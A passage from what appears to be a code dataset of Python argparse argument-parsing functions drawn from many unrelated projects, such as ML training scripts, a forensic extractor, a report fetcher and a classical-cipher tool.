cmdl_args.debug:\n print('==DEBUG== Running in debug mode.')\n prv_parser_args['--verbose'] = True\n\n return cmdl_args", "def add_args(self, parser):", "def ParseArguments():\n\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--db_file_path\", required = False, help = \"SQLite database filename\", type = str, default = '')\n parser.add_argument(\"--server_url\", required = False, help = \"Server's domain name\", type = str, default = '')\n parser.add_argument(\"--substation_name\", required = False, help = \"Substation name\", type = str, default = '')\n parser.add_argument(\"--net_interfaces\", required = False, help = \"List of network interfaces\", type = str)\n parser.add_argument(\"--no_hostname_check\", required = False, help = \"Disable TLS certificate hostname validation (insecure)\", action = 'store_true')\n parser.add_argument(\"--external_interval\", required = False, help = \"Interval (s) between invocations of external commands\", default = '3')\n parser.add_argument(\"--external_timeout\", required = False, help = \"Maximum time (s) an external command is allowed to run\", default = None)\n parser.add_argument(\"--external_command\", required = False, help = \"Periodically invoke given command to gather external data. 
Use repeatedly.\", action = 'append', default = [])\n parser.add_argument(\"--uuid\", required = False, help = \"To get UUID or hostname (set by default) as an unique ID.\", action = 'store_true')\n\n argv = parser.parse_args(sys.argv[1:])\n\n config_data = {}\n try:\n if os.path.isfile('config.json'):\n json_data_file = open('config.json', 'r')\n config_data = json.load(json_data_file)\n required_keys = ['db_file_path', 'server_url']\n for key in required_keys:\n if key not in config_data:\n print('config.json file does not contain required key %s' % key)\n sys.exit()\n else:\n print('config.json does not exist in the current directory.')\n sys.exit()\n except IOError:\n sys.exit()\n\n config_data['no_hostname_check'] = argv.no_hostname_check or config_data.get('no_hostname_check', False)\n\n interval = float(argv.external_interval)\n\n if argv.external_timeout is None:\n timeout = interval\n else:\n timeout = float(argv.external_timeout)\n\n if timeout > interval:\n print('Error: External command timeout is longer than interval')\n sys.exit()\n\n config_data['external_interval'] = interval\n config_data['external_timeout'] = timeout\n config_data['external_command'] = argv.external_command\n config_data['substation_name'] = argv.substation_name\n config_data['uuid'] = argv.uuid\n\n if argv.db_file_path == '':\n if not config_data['db_file_path']:\n config_data['db_file_path'] = '/var/local/agent_sqlite3.db'\n print('SQLite3 database file is set by default: /var/local/agent_sqlite3.db')\n else:\n config_data['db_file_path'] = argv.db_file_path\n\n ifs = argv.net_interfaces or config_data.get('net_interfaces', [])\n if isinstance(ifs, str):\n ifs = ifs.split(',')\n config_data['net_interfaces'] = utils.interfaces_to_ip(ifs)\n\n # TODO verify provided URL\n if argv.server_url == '':\n if not config_data['server_url']:\n print('Please, provide server URL as an argument or in config.json file.')\n print('It must be in this format: wss://<domain_name>:443/agent')\n sys.exit()\n else:\n config_data['server_url'] = argv.server_url\n\n\n return config_data", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n parser.add_argument('--debug', dest='debug', default=False, action='store_true', help='set to debug mode ')\n parser.add_argument('--num_train_sentence', dest='num_train_sentence', type=int, default=-1,\n help='set number of sentence to train on')\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n parser.add_argument('--attn_model', type=str, default='general', help='Attention model to use: general (default), dot, concat')\n\n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, 
default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def handle_arguments():\n # process the command options\n parser = argparse.ArgumentParser()\n parser.add_argument('images', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\images.npy\"')\n parser.add_argument('labels', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\labels.csv\"')\n parser.add_argument('-t', '--test_ratio', type=float, default=0.2,\n help='proportion of data for testing, default: 0.2')\n parser.add_argument('-s', '--seed', type=int, default=None, help='seed '\n 'used for consistent data splitting, default: None')\n parser.add_argument('-a', '--data_augmentation', action='store_true',\n help='switch to augment the images')\n drop_info_fns = ['cutout', 'gridmask', 'None'] # info dropping algorithms\n parser.add_argument('-d', '--drop_info_fn', type=str, choices=drop_info_fns,\n default=None, help='whether cutout, GridMask, or no '\n 'information dropping algorithm is used, default: None')\n parser.add_argument('-c', '--class_balancing', action='store_true',\n help='switch to perform class balancing')\n parser.add_argument('-b', '--batch_size', type=int, default=32,\n help='batch size of DataLoader objects, default: 32')\n parser.add_argument('-l', '--label_smoothing', action='store_true',\n help='switch to use soft targets in loss computation')\n parser.add_argument('-e', '--epochs', type=int, default=50, help='number '\n 'of iterations over training data, default: 50')\n parser.add_argument('-m', '--model', type=str, default='model.pt',\n help='path to save trained model, default: \"model.pt\"')\n\n # parse and print arguments\n args = parser.parse_args()\n for arg in vars(args):\n print(f'{arg.upper()}: {getattr(args, arg)}')\n\n return args", "def parse_args(self):\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--data', dest='data',\n help='Generate requested amount of test data.',\n type=int, nargs='+')\n parser.add_argument('-c', '--check', action='store_true',\n dest='check', help='Check files without modifying them.',\n default=False)\n args = parser.parse_args()\n self.arg_data = args.data\n self.arg_check = args.check\n\n if xc.arg_data: # did the user request to generate test data?\n choice = input(Fore.YELLOW + 'This option will ' + Fore.RED +\n '*OVERWRITE ALL FILES* ' + Fore.YELLOW + 'you sure (y/n)? 
')\n if choice.upper() == 'Y':\n self.test_data_row_count = int(self.arg_data[0])\n xc.generate_test_data()\n else:\n xc.arg_data = False\n else:\n self.process_dump_files()", "def parse_arguments():\n p = argparse.ArgumentParser(description='Prepare the dataset for use by neural models.')\n p.add_argument(\"json_file\", type=argparse.FileType('r'), help=\"json file with all the data\")\n p.add_argument(\"prefix\", type=str, help=\"prefix for all the generated files\")\n p.add_argument(\"data_type\", type=str, choices=[\"names\", \"comments\", \"nc\"],\n default=\"nc\", help=\"type of the information recorded in the dataset\")\n p.add_argument(\"labels\", type=str, choices=[\"PROG\", \"ALL\", \"TOP\"],\n default=\"PROG\", help=\"method by which to choose the labels for the dataset\")\n p.add_argument(\"-other_label\", type=str, required=False, default=\"\",\n help=\"label to use instead of all infrequent labels. \"\n \"This can be left blank to ignore infrequent labels altogether\")\n p.add_argument(\"-label_num\", type=int, default=100, required=False,\n help=\"Number of most frequent labels to keep. Works with label_choice=TOP\")\n p.add_argument(\"-min_prog_labels\", type=int, default=5, required=False,\n help=\"Minimal number of programs a label has to appear in for it to be included \"\n \"in the dataset. Works with label_choice=PROG\")\n p.add_argument(\"-test_prog_list\", type=argparse.FileType('r'), default=None, required=False,\n help=\"file with the list of programs in the test set (optional)\")\n\n return p.parse_args(sys.argv[1:])", "def _ParseCommandArguments():\n arg_parser = argparse.ArgumentParser()\n arg_parser.usage = __doc__\n\n arg_parser.add_argument('--download-dir',\n type=str,\n required=True,\n help='Directory into which corpora are downloaded.')\n arg_parser.add_argument('--build-dir',\n required=True,\n type=str,\n help='Directory where fuzzers were built.')\n args = arg_parser.parse_args()\n return args", "def ParseArguments(self):\n self._ConfigureLogging()\n\n argument_parser = argparse.ArgumentParser(\n description=self.DESCRIPTION, epilog=self.EPILOG, add_help=False,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n self.AddBasicOptions(argument_parser)\n self.AddInformationalOptions(argument_parser)\n\n names = [u'artifact_definitions', u'data_location']\n helpers_manager.ArgumentHelperManager.AddCommandLineArguments(\n argument_parser, names=names)\n\n self.AddLogFileOptions(argument_parser)\n\n self.AddStorageMediaImageOptions(argument_parser)\n self.AddVSSProcessingOptions(argument_parser)\n\n self.AddFilterOptions(argument_parser)\n\n argument_parser.add_argument(\n u'-w', u'--write', action=u'store', dest=u'path', type=str,\n metavar=u'PATH', default=u'export', help=(\n u'The directory in which extracted files should be stored.'))\n\n argument_parser.add_argument(\n u'--include_duplicates', dest=u'include_duplicates',\n action=u'store_true', default=False, help=(\n u'If extraction from VSS is enabled, by default a digest hash '\n u'is calculated for each file. These hashes are compared to the '\n u'previously exported files and duplicates are skipped. 
Use '\n u'this option to include duplicate files in the export.'))\n\n argument_parser.add_argument(\n self._SOURCE_OPTION, nargs='?', action=u'store', metavar=u'IMAGE',\n default=None, type=str, help=(\n u'The full path to the image file that we are about to extract '\n u'files from, it should be a raw image or another image that '\n u'plaso supports.'))\n\n try:\n options = argument_parser.parse_args()\n except UnicodeEncodeError:\n # If we get here we are attempting to print help in a non-Unicode\n # terminal.\n self._output_writer.Write(u'')\n self._output_writer.Write(argument_parser.format_help())\n return False\n\n try:\n self.ParseOptions(options)\n except errors.BadConfigOption as exception:\n self._output_writer.Write(u'ERROR: {0!s}\\n'.format(exception))\n self._output_writer.Write(u'')\n self._output_writer.Write(argument_parser.format_usage())\n return False\n\n return True", "def parse_args(argv):\n\n parser = argparse.ArgumentParser(description='Fetch the requested report from App Nexus and save it to file system.')\n\n parser.add_argument('report_request', help='Path to JSON file that contains the report request.')\n parser.add_argument('-c', '--config', help='Path to JSON file that contains the keys \"api_endpoint\", \"user\" and \"pass\". If this parameter is not given, env vars APPNEXUS_API_ENDPOINT, APPNEXUS_USER and APPNEXUS_PASS must be set.')\n parser.add_argument('-d', '--save_dir', default='', help='The directory to save the report CSV. Default is current directory.')\n parser.add_argument('-I', '--no-interaction', action='store_true', help='Whether to ask confirmation before fetching report.')\n parser.add_argument('-s', '--start', help='Value for \"start_date\" parameter of report request.')\n parser.add_argument('-e', '--end', help='Value for \"end_date\" parameter of report request.')\n parser.add_argument('-i', '--interval', help='Value for \"report_interval\" parameter of report request.')\n parser.add_argument('--debug', action='store_true', help='Whether to print extra debug information or not.')\n\n args = parser.parse_args(argv[1:])\n\n\n if args.config:\n args.config = json.load(open(args.config, 'r'))\n\n elif (\n os.environ.get('APPNEXUS_API_ENDPOINT') and\n os.environ.get('APPNEXUS_USER') and\n os.environ.get('APPNEXUS_PASS')\n ):\n args.config = {\n 'api_endpoint': os.environ['APPNEXUS_API_ENDPOINT'],\n 'user' : os.environ['APPNEXUS_USER'],\n 'pass' : os.environ['APPNEXUS_PASS']\n }\n\n else:\n print \"\"\"\n You must either provide a --config parameter or\n set the env vars APPNEXUS_API_ENDPOINT, APPNEXUS_USER and APPNEXUS_PASS!\n Call this script with the --help option for more information.\n \"\"\"\n\n sys.exit(1)\n\n\n return args", "def _parse_options(self, force_args=None):\r\n argv = sys.argv[1:] if force_args is None else force_args\r\n if argv and argv[0] in self._commands:\r\n self._command = argv.pop(0)\r\n else:\r\n self._command = None\r\n parser = self._construct_full_parser()\r\n self._option_values, self._argv = parser.parse(self._add_default_options(argv))", "def parse_arguments(args):\n\n parser = argparse.ArgumentParser(\n description=\"Text2Text: Read input text training files, output item files and train a model\"\n )\n\n parser.add_argument(\n \"-i\",\n \"--input-text-path\",\n type=str,\n required=True,\n metavar=\"INPUT_TEXT_PATH\",\n help=\"Text input file name. 
Format: in each line, OUTPUT_ID1,OUTPUT_ID2,OUTPUT_ID3,...\\t INPUT_TEXT \\\n where OUTPUT_IDs are the zero-based output item indices corresponding to the line numbers of OUTPUT_ITEM_PATH. We assume utf-8 encoding for text.\",\n )\n\n parser.add_argument(\n \"-q\",\n \"--output-item-path\",\n type=str,\n required=True,\n metavar=\"OUTPUT_ITEM_PATH\",\n help=\"Output item file name. Format: each line corresponds to a representation of the output item. We assume utf-8 encoding for text.\",\n )\n\n parser.add_argument(\n \"-m\",\n \"--model-folder\",\n type=str,\n required=True,\n metavar=\"MODEL_FOLDER\",\n help=\"Output model folder name\",\n )\n\n parser.add_argument(\n \"--workspace-folder\",\n type=str,\n default=None,\n metavar=\"WORKSPACE_FOLDER\",\n help=\"A folder name for storing intermediate variables during training\",\n )\n\n vectorizer_config_group_parser = parser.add_mutually_exclusive_group()\n vectorizer_config_group_parser.add_argument(\n \"--vectorizer-config-path\",\n type=str,\n default=None,\n metavar=\"VECTORIZER_CONFIG_PATH\",\n help=\"Json file for vectorizer config (default tfidf vectorizer)\",\n )\n\n vectorizer_config_group_parser.add_argument(\n \"--vectorizer-config-json\",\n type=str,\n default='{\"type\":\"tfidf\", \"kwargs\":{}}',\n metavar=\"VECTORIZER_CONFIG_JSON\",\n help='Json-format string for vectorizer config (default {\"type\":\"tfidf\", \"kwargs\":{}})',\n )\n\n parser.add_argument(\n \"--dtype\",\n type=lambda x: np.float32 if \"32\" in x else np.float64,\n default=np.float32,\n help=\"data type for the csr matrix. float32 | float64. (default float32)\",\n )\n\n parser.add_argument(\n \"--max-leaf-size\",\n type=cli.comma_separated_type(int),\n default=[100],\n metavar=\"INT-LIST\",\n help=\"The max size of the leaf nodes of hierarchical 2-means clustering. Multiple values (separated by comma) are supported and will lead to different individual models for ensembling. (default [100])\",\n )\n\n parser.add_argument(\n \"--nr-splits\",\n type=int,\n default=2,\n metavar=\"INT\",\n help=\"number of splits used to construct hierarchy (a power of 2 is recommended, default 2)\",\n )\n\n parser.add_argument(\n \"--imbalanced-ratio\",\n type=float,\n default=0.0,\n metavar=\"FLOAT\",\n help=\"Value between 0.0 and 0.5 (inclusive). Indicates how relaxed the balancedness constraint of 2-means can be. Specifically, if an iteration of 2-means is clustering L labels, the size of the output 2 clusters will be within approx imbalanced_ratio * 2 * L of each other. (default 0.0)\",\n )\n\n parser.add_argument(\n \"--imbalanced-depth\",\n type=int,\n default=100,\n metavar=\"INT\",\n help=\"After hierarchical 2-means clustering has reached this depth, it will continue clustering as if --imbalanced-ratio is set to 0.0. (default 100)\",\n )\n\n parser.add_argument(\n \"--label-embed-type\",\n type=cli.comma_separated_type(str),\n default=\"pifa\",\n metavar=\"STR-LIST\",\n help=\"Label embedding types. (default pifa).\\\n We support pifa, pifa_lf_concat::Z=path, and pifa_lf_convex_combine::Z=path::alpha=scalar_value,\\\n where path is the additional user-porivded label embedding path and alpha is the scalar value for convex combination.\\\n Multiple values (separated by comma) are supported and will lead to different individual models for ensembling.\",\n )\n\n parser.add_argument(\n \"--indexer\",\n choices=Indexer.indexer_dict.keys(),\n default=\"hierarchicalkmeans\",\n metavar=\"STR\",\n help=f\"Indexer algorithm (default hierarchicalkmeans). 
Available choices are {', '.join(Indexer.indexer_dict.keys())}\",\n )\n\n parser.add_argument(\n \"--no-spherical\",\n action=\"store_true\",\n default=False,\n help=\"Do not l2-normalize cluster centers while clustering\",\n )\n\n parser.add_argument(\n \"--seed\",\n type=cli.comma_separated_type(int),\n default=[0],\n metavar=\"INT-LIST\",\n help=\"Random seeds (default 0). Multiple values (separated by comma) are supported and will lead to different individual models for ensembling.\",\n )\n\n parser.add_argument(\n \"--max-iter\",\n type=int,\n default=20,\n metavar=\"INT\",\n help=\"The max iteration for indexing (default 20)\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--threads\",\n type=int,\n default=-1,\n metavar=\"INT\",\n help=\"Number of threads to use (default -1 to denote all the CPUs)\",\n )\n\n # Linear matching/ranking parameters\n parser.add_argument(\n \"-s\",\n \"--solver-type\",\n type=str,\n default=\"L2R_L2LOSS_SVC_DUAL\",\n metavar=\"STR\",\n help=\"{} (default L2R_L2LOSS_SVC_DUAL)\".format(\" | \".join(XLINEAR_SOLVERS.keys())),\n )\n\n parser.add_argument(\n \"--Cp\",\n type=float,\n default=1.0,\n metavar=\"VAL\",\n help=\"Coefficient for positive class in the loss function (default 1.0)\",\n )\n\n parser.add_argument(\n \"--Cn\",\n type=float,\n default=1.0,\n metavar=\"VAL\",\n help=\"Coefficient for negative class in the loss function (default 1.0)\",\n )\n\n parser.add_argument(\n \"--bias\", type=float, default=1.0, metavar=\"VAL\", help=\"bias term (default 1.0)\"\n )\n\n parser.add_argument(\n \"-ns\",\n \"--negative-sampling\",\n type=str,\n choices=[\"tfn\", \"man\", \"tfn+man\"],\n default=\"tfn\",\n metavar=\"STR\",\n help=\"Negative Sampling Schemes\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--threshold\",\n type=float,\n default=0.1,\n metavar=\"VAL\",\n help=\"Threshold to sparsify the model weights (default 0.1)\",\n )\n\n # Prediction kwargs\n parser.add_argument(\n \"-k\",\n \"--only-topk\",\n type=int,\n default=20,\n metavar=\"INT\",\n help=\"the default number of top labels used in the prediction\",\n )\n\n parser.add_argument(\n \"-b\",\n \"--beam-size\",\n type=int,\n default=10,\n metavar=\"INT\",\n help=\"the default size of beam search used in the prediction\",\n )\n\n parser.add_argument(\n \"-pp\",\n \"--post-processor\",\n type=str,\n choices=PostProcessor.valid_list(),\n default=\"l3-hinge\",\n metavar=\"STR\",\n help=\"the default post processor used in the prediction\",\n )\n\n parser.add_argument(\n \"--verbose-level\",\n type=int,\n choices=logging_util.log_levels.keys(),\n default=1,\n metavar=\"INT\",\n help=f\"the verbose level, {', '.join([str(k) + ' for ' + logging.getLevelName(v) for k, v in logging_util.log_levels.items()])}, default 1\",\n )\n\n parsed_args = parser.parse_args(args)\n return parsed_args", "def parseArgs(args):\n parser = argparse.ArgumentParser(description = \"Scrapes baseball-reference.com for player statistics\")\n\n parser.add_argument(\"-d\", \"--domain\", help=\"domain to scrape for statistics. Default is baseball-reference.com\", nargs=1, default=[\"http://www.baseball-reference.com\"])\n parser.add_argument(\"-f\", \"--filename\", help=\"database file to store data in\", required=True, nargs=1, type=argparse.FileType(\"r+\"))\n parser.add_argument(\"-r\", \"--reset\", help=\"removes database before scraping all data from baseball-reference. Conflicts with -u. 
One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"-u\", \"--update\", help=\"scrapes baseball-reference and adds all new information to the database. Conflicts with -r. One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"--verbose\", help=\"enables verbose output\", action=\"store_true\")\n parser.add_argument(\"--version\", help=\"prints out version and exits\", action=\"version\", version=\"%(prog)s ({version})\".format(version=__version__))\n\n parsedArgs = parser.parse_args()\n\n if parsedArgs.reset == parsedArgs.update:\n parser.error(\"-r and -u are conflicting flags. Exactly one must be specified\")\n parser.print_help()\n\n return parsedArgs", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('n_iter',\n help='number of iteration',\n type=int)\n parser.add_argument('n_processes',\n help='number of processes',\n type=int)\n parser.add_argument('method',\n help='mutual exclusion method')\n parser.add_argument('duration',\n help='Duration of each process',\n type=float)\n return parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser()\n\n # Positional args\n parser.add_argument('data_directory', action=\"store\")\n\n # Optional args\n parser.add_argument('--save_dir', action='store',\n dest='save_dir',\n help='Load categories names from given file',\n default=\"checkpoint.pth\")\n\n parser.add_argument('--gpu', action='store_true',\n dest='device',\n help='Device of prediction processing',\n default=False)\n\n parser.add_argument('--arch', action='store',\n dest='arch',\n help='Name of pre-trained network used for training',\n default=\"vgg11\")\n\n parser.add_argument('--learning_rate', action='store',\n dest='learning_rate',\n help='value of training learning rate',\n default=0.001)\n\n parser.add_argument('--hidden_units', action='store',\n dest='hidden_units',\n help='Number of units in the fully-connected hidden '\n 'layer of the neural netwrork',\n default=512)\n\n parser.add_argument('--epochs', action='store',\n dest='epochs',\n help='Number of training epochs',\n default=5)\n\n # Parse all args\n results = parser.parse_args()\n\n return results", "def parse_args(self):\n parser = argparse.ArgumentParser(description='Build PDF documentation')\n parser.add_argument('config', help='YAML config file')\n parser.add_argument('-f', '--fast', help='Do not update toc',\n action='store_true', default=False)\n parser.add_argument('-p', '--pandoc', help='Only pandoc, no latex',\n action='store_true', default=False)\n parser.add_argument('-n', '--nocache', help='Disable cache',\n action='store_true', default=False)\n parser.add_argument('-v', '--verbose', help='Enables verbose output; '\n 'repeat up to three time for more verbose output',\n action='count', default=0)\n\n self.args = parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(prog='AdapterRunner', description='Adapter Runner Application')\n parser.add_argument('-a', '--application', action='store', dest='app_name', help='Application Name',\n metavar='<application_name>')\n parser.add_argument('-fi', '--fetch_interval', action='store', dest='fetch_stats_interval', help='Fetch Stats Interval',\n metavar='<fetch_interval in seconds>')\n return parser.parse_args()", "def handle_args():\n parser = argparse.ArgumentParser(\n description=\"\"\"Script to download archives from the NLM public\n FTP server.\n \"\"\")\n # Server settings\n server_settings = 
parser.add_argument_group('FTP SERVER SETTINGS', '')\n server_settings.add_argument(\n '-n', '--netrc', default='~/.netrc',\n help=\"\"\"netrc file containing login parameters for the NLM\n server. See `man 5 netrc` for details on generating this\n file or read nlm_data_import/netrc/example.netrc.\n \"\"\")\n server_settings.add_argument(\n 'server_data_dir',\n help='Directory containing desired files on the NLM FTP server')\n server_settings.add_argument(\n '-l', '--limit', type=int, default=0,\n help='Only download LIMIT files.')\n\n # Download settings\n local_settings = parser.add_argument_group('LOCAL SETTINGS', '')\n local_settings.add_argument(\n '-d', '--download_database', default='~/.ftp_download_db',\n help='Path to SQLite database detailing past downloads')\n local_settings.add_argument(\n '-o', '--output_dir', default='~/medline_data',\n help='Directory where downloads will be saved')\n local_settings.add_argument(\n '-x', '--export_dir', default='~/medline_data_exports',\n help=\"\"\"Directory where data to be retrieved by the\n `hypothesis_graph application server are staged.\n \"\"\")\n # Sending debug emails (requires the send_ses_messages module - see\n # setup.py)\n debugging_settings = parser.add_argument_group('DEBUGGING SETTINGS', '')\n debugging_settings.add_argument(\n '--email_debugging', default=False, action='store_true',\n help=\"Send debugging emails. Defaults to FALSE.\")\n debugging_settings.add_argument(\n '--from_email', required=False, help=\"FROM field for debugging emails\")\n debugging_settings.add_argument(\n '--to_email', required=False, help=\"TO field for debugging emails\")\n\n return parser.parse_args()", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_arguments(cls):\r\n parser = argparse.ArgumentParser(description='Easy Infer for model benchmark')\r\n cls.base_arg_parse(parser)\r\n cls.model_arg_parse(parser)\r\n cls.task_arg_parse(parser)\r\n args = parser.parse_args()\r\n return args", "def _parse_arguments():\n parser = argparse.ArgumentParser(\n prog=\"JSON sorter\",\n description=\"Take a json file, sort the keys and insert 4 spaces for indents.\",\n )\n\n parser.add_argument(\n \"input\", help=\"JSON file to parse.\",\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n default=sys.stdout,\n type=argparse.FileType(mode=\"w\"),\n help=\"File to write to. 
Defaults to stdout.\",\n )\n\n # Should probably implement this and CSV as subcommands\n parser.add_argument(\n \"-y\",\n \"--yaml\",\n action=\"store_true\",\n help=\"Whether to sort a YAML file provided as the input.\",\n )\n\n # is there a way to have info printed with this from argparse?\n parser.add_argument(\n \"-l\",\n \"--log\",\n action=\"store_true\",\n help=\"Turn logging on and print to console.\",\n )\n\n parser.add_argument(\n \"-ll\",\n \"--log_level\",\n dest=\"log_level\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"],\n help=\"Set the logging level\",\n )\n\n parser.add_argument(\n \"-V\", \"--version\", action=\"version\", version=\"%(prog)s\" + __version__\n )\n\n if len(sys.argv[1:]) == 0:\n parser.print_help()\n sys.exit()\n\n args = parser.parse_args()\n return args", "def parse_arguments(args: list = None) -> Dict[str, str]:\n arg_parser = argparse.ArgumentParser(description=\"Console command to crypt \"\n \"and decrypt texts using \"\n \"classic methods. It also \"\n \"performs crypto attacks \"\n \"against those methods.\\n\",\n epilog=\"Follow cifra development at: \"\n \"<https://github.com/dante-signal31/cifra>\")\n cifra_subparsers = arg_parser.add_subparsers(help=\"Available modes\",\n dest=\"mode\",\n required=True)\n # DICTIONARY MANAGEMENT.\n dictionary_parser = cifra_subparsers.add_parser(name=\"dictionary\",\n help=\"Manage dictionaries to \"\n \"perform crypto attacks.\")\n dictionary_actions_subparser = dictionary_parser.add_subparsers(help=\"Action to perform.\",\n dest=\"action\")\n # DICTIONARY CREATION.\n dictionary_create_parser = dictionary_actions_subparser.add_parser(name=\"create\",\n help=\"Create a dictionary of unique words.\")\n dictionary_create_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to create.\",\n metavar=\"NEW_DICTIONARY_NAME\")\n dictionary_create_parser.add_argument(\"-i\", \"--initial_words_file\",\n type=_check_is_file,\n help=\"Optionally you can load in the dictionary words located in a text file\",\n metavar=\"PATH_TO FILE_WITH_WORDS\")\n # DICTIONARY REMOVAL.\n dictionary_delete_parser = dictionary_actions_subparser.add_parser(name=\"delete\",\n help=\"Remove an existing dictionary.\")\n dictionary_delete_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to delete.\",\n metavar=\"DICTIONARY_NAME_TO_DELETE\")\n # DICTIONARY UPDATING.\n dictionary_update_parser = dictionary_actions_subparser.add_parser(name=\"update\",\n help=\"Add words to an existing dictionary.\")\n dictionary_update_parser.add_argument(\"dictionary_name\",\n type=str,\n help=\"Name for the dictionary to update with additional words.\",\n metavar=\"DICTIONARY_NAME_TO_UPDATE\")\n dictionary_update_parser.add_argument(\"words_file\",\n type=_check_is_file,\n help=\"Pathname to a file with words to add to dictionary\",\n metavar=\"PATH_TO_FILE_WITH_WORDS\")\n # DICTIONARY LISTING.\n _ = dictionary_actions_subparser.add_parser(name=\"list\",\n help=\"Show existing dictionaries.\")\n # CIPHER MANAGEMENT.\n cipher_parser = cifra_subparsers.add_parser(name=\"cipher\",\n help=\"Cipher a text using a key.\")\n cipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to cipher.\",\n metavar=\"ALGORITHM_NAME\")\n cipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to cipher.\",\n metavar=\"CIPHERING_KEY\")\n cipher_parser.add_argument(\"file_to_cipher\",\n type=_check_is_file,\n help=\"Path to 
file with text to cipher.\",\n metavar=\"FILE_TO_CIPHER\")\n cipher_parser.add_argument(\"-o\", \"--ciphered_file\",\n type=str,\n help=\"Path to output file to place ciphered text. If not used then\"\n \"ciphered text will be dumped to console.\",\n metavar=\"OUTPUT_CIPHERED_FILE\")\n cipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # DECIPHERING MANAGEMENT\n decipher_parser = cifra_subparsers.add_parser(name=\"decipher\",\n help=\"Decipher a text using a key.\")\n decipher_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to use to decipher.\",\n metavar=\"ALGORITHM_NAME\")\n decipher_parser.add_argument(\"key\",\n type=str,\n help=\"Key to use to decipher.\",\n metavar=\"CIPHERING_KEY\")\n decipher_parser.add_argument(\"file_to_decipher\",\n type=_check_is_file,\n help=\"Path to file with text to decipher.\",\n metavar=\"FILE_TO_DECIPHER\")\n decipher_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n decipher_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n # ATTACK MANAGEMENT\n attack_parser = cifra_subparsers.add_parser(name=\"attack\",\n help=\"Attack a ciphered text to get its plain text\")\n attack_parser.add_argument(\"algorithm\",\n choices=CIPHERING_ALGORITHMS,\n type=str,\n help=\"Algorithm to attack.\",\n metavar=\"ALGORITHM_NAME\")\n attack_parser.add_argument(\"file_to_attack\",\n type=_check_is_file,\n help=\"Path to file with text to attack.\",\n metavar=\"FILE_TO_ATTACK\")\n attack_parser.add_argument(\"-o\", \"--deciphered_file\",\n type=str,\n help=\"Path to output file to place deciphered text. 
If not used then\"\n \"deciphered text will be dumped to console.\",\n metavar=\"OUTPUT_DECIPHERED_FILE\")\n attack_parser.add_argument(\"-c\", \"--charset\",\n type=str,\n help=f\"Default charset is: {cifra.cipher.common.DEFAULT_CHARSET}, but you can set here \"\n f\"another.\",\n metavar=\"CHARSET\")\n\n parsed_arguments = vars(arg_parser.parse_args(args))\n filtered_parser_arguments = {key: value for key, value in parsed_arguments.items()\n if value is not None}\n return filtered_parser_arguments", "def parse_arguments():\n # shift away script name\n scriptname=sys.argv[0]\n shift()\n ncl_cmd=list()\n quali_cmd=list()\n id_cmd=list() \n while(len(sys.argv)>0):\n carg = sys.argv[0]\n shift()\n if(carg == \"--nucleotide\"):\n ncl_cmd = mungeArgs(sys.argv)\n elif(carg == \"--quality\"):\n quali_cmd = mungeArgs(sys.argv)\n elif(carg == \"--id\" ):\n id_cmd = mungeArgs(sys.argv)\n elif(carg in [\"-h\", \"--help\"]):\n usage()\n else:\n usage(error=True)\n # Excess arguments which are not processed \n if(len(sys.argv) > 0):\n sys.stdout.write(\"Excess 